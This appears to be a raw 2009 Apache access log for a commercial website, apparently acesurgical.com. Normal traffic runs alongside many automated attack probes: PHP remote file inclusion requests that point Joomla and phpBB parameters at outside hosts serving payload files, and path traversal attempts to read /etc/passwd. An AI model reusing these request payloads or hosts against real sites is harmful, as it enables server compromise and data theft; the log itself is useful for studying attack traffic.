62.140.23.185 - - [10/Jun/2009:08:14:47 -0400] "GET /?sourcedir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
62.140.23.185 - - [10/Jun/2009:08:14:47 -0400] "GET /logs/?sourcedir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
87.19.247.39 - - [10/Jun/2009:08:15:00 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.820"
62.140.23.185 - - [10/Jun/2009:08:15:02 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.217.216.86 - - [10/Jun/2009:08:15:07 -0400] "GET /logs/access_log.Q109052300/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:08:15:08 -0400] "GET /index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:08:15:08 -0400] "GET /logs/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:08:15:08 -0400] "GET /logs/access_log.Q109052300/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:08:15:12 -0400] "GET /logs/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:08:15:12 -0400] "GET /index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:08:15:24 -0400] "GET /logs/access_log.Q109052800/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:08:15:34 -0400] "GET /logs/access_log.Q109052800/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
172.16.1.180 - - [10/Jun/2009:08:15:54 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:15:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:15:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:17:30 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:17:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:17:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [10/Jun/2009:08:17:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.78 - - [10/Jun/2009:08:17:52 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:17:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:17:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.6.22.170 - - [10/Jun/2009:08:18:30 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.170 - - [10/Jun/2009:08:18:30 -0400] "GET /logs/access_log.Q108052400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
172.16.1.180 - - [10/Jun/2009:08:18:33 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:18:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:18:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
212.158.160.121 - - [10/Jun/2009:08:19:08 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
212.158.160.121 - - [10/Jun/2009:08:19:08 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
212.158.160.121 - - [10/Jun/2009:08:19:09 -0400] "GET /logs/access_log.Q109052500//modules/4nAlbum/public/displayCategory.php?basepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
87.19.247.39 - - [10/Jun/2009:08:19:31 -0400] "GET /logs/error_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:19:32 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:19:33 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.820"
172.16.1.78 - - [10/Jun/2009:08:19:54 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:19:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:19:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
212.158.160.121 - - [10/Jun/2009:08:20:16 -0400] "GET /logs/access_log.Q109052500%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
212.158.160.121 - - [10/Jun/2009:08:20:24 -0400] "GET /logs/access_log.Q109052400%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
202.181.98.137 - - [10/Jun/2009:08:20:34 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mediask2.info/wb/Themes/babylon2/test.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
202.181.98.137 - - [10/Jun/2009:08:20:35 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mediask2.info/wb/Themes/babylon2/test.txt?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
172.16.1.180 - - [10/Jun/2009:08:20:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:20:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:20:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
87.19.247.39 - - [10/Jun/2009:08:21:54 -0400] "GET /logs/error_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:21:54 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:21:58 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.820"
172.16.1.180 - - [10/Jun/2009:08:22:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:22:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:22:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [10/Jun/2009:08:22:37 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [10/Jun/2009:08:22:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [10/Jun/2009:08:22:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
124.217.216.86 - - [10/Jun/2009:08:22:39 -0400] "GET /logs/error_log.Q108052600%20/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
209.59.12.99 - - [10/Jun/2009:08:22:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.217.216.86 - - [10/Jun/2009:08:23:10 -0400] "GET /logs/error_log.Q108052600%20/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
155.212.232.66 - - [10/Jun/2009:08:23:28 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
155.212.232.66 - - [10/Jun/2009:08:23:28 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
155.212.232.66 - - [10/Jun/2009:08:23:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
155.212.232.66 - - [10/Jun/2009:08:23:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
172.16.1.68 - - [10/Jun/2009:08:23:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.68 - - [10/Jun/2009:08:23:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.68 - - [10/Jun/2009:08:23:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:23:48 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:23:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:23:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
212.158.160.121 - - [10/Jun/2009:08:23:49 -0400] "GET /logs/access_log.Q109052400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
172.16.1.180 - - [10/Jun/2009:08:24:57 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:24:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:24:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [10/Jun/2009:08:25:27 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [10/Jun/2009:08:25:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [10/Jun/2009:08:25:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.219.99.129 - - [10/Jun/2009:08:25:51 -0400] "GET /logs/error_log.Q108110600//index.php?DOCUMENT_ROOT=http://eva.ceser.hyogo-u.ac.jp/b1ttletX1.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
66.219.99.129 - - [10/Jun/2009:08:25:51 -0400] "GET //index.php?DOCUMENT_ROOT=http://eva.ceser.hyogo-u.ac.jp/b1ttletX1.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
66.219.99.129 - - [10/Jun/2009:08:25:51 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://eva.ceser.hyogo-u.ac.jp/b1ttletX1.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
172.16.1.170 - - [10/Jun/2009:08:26:00 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [10/Jun/2009:08:26:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [10/Jun/2009:08:26:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:26:24 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:26:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:26:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
76.124.153.14 - - [10/Jun/2009:08:26:40 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
76.124.153.14 - - [10/Jun/2009:08:26:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
76.124.153.14 - - [10/Jun/2009:08:26:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
76.124.153.14 - - [10/Jun/2009:08:26:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
172.16.1.168 - - [10/Jun/2009:08:27:12 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [10/Jun/2009:08:27:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [10/Jun/2009:08:27:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [10/Jun/2009:08:27:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.78 - - [10/Jun/2009:08:27:57 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:27:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:27:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
70.85.165.10 - - [10/Jun/2009:08:28:56 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:28:56 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:28:56 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:28:56 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:28:57 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:28:57 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:28:59 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:28:59 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:28:59 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:29:00 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:29:01 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:29:03 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.168 - - [10/Jun/2009:08:29:20 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [10/Jun/2009:08:29:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [10/Jun/2009:08:29:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
79.174.72.67 - - [10/Jun/2009:08:29:50 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
79.174.72.67 - - [10/Jun/2009:08:29:50 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
79.174.72.67 - - [10/Jun/2009:08:29:50 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
172.16.1.180 - - [10/Jun/2009:08:30:09 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:30:09 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:30:09 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
70.85.165.10 - - [10/Jun/2009:08:31:48 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:31:53 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:31:55 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:31:55 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:32:06 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:32:07 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:08:32:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [10/Jun/2009:08:32:41 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:32:41 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:32:41 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:32:52 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:34:09 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:34:09 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:34:13 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:34:13 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:34:13 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:34:20 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.54.28.195 - - [10/Jun/2009:08:34:22 -0400] "GET /logs/access_log.Q109052400//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
190.54.28.195 - - [10/Jun/2009:08:34:22 -0400] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
190.54.28.195 - - [10/Jun/2009:08:34:22 -0400] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
71.252.170.143 - - [10/Jun/2009:08:34:32 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
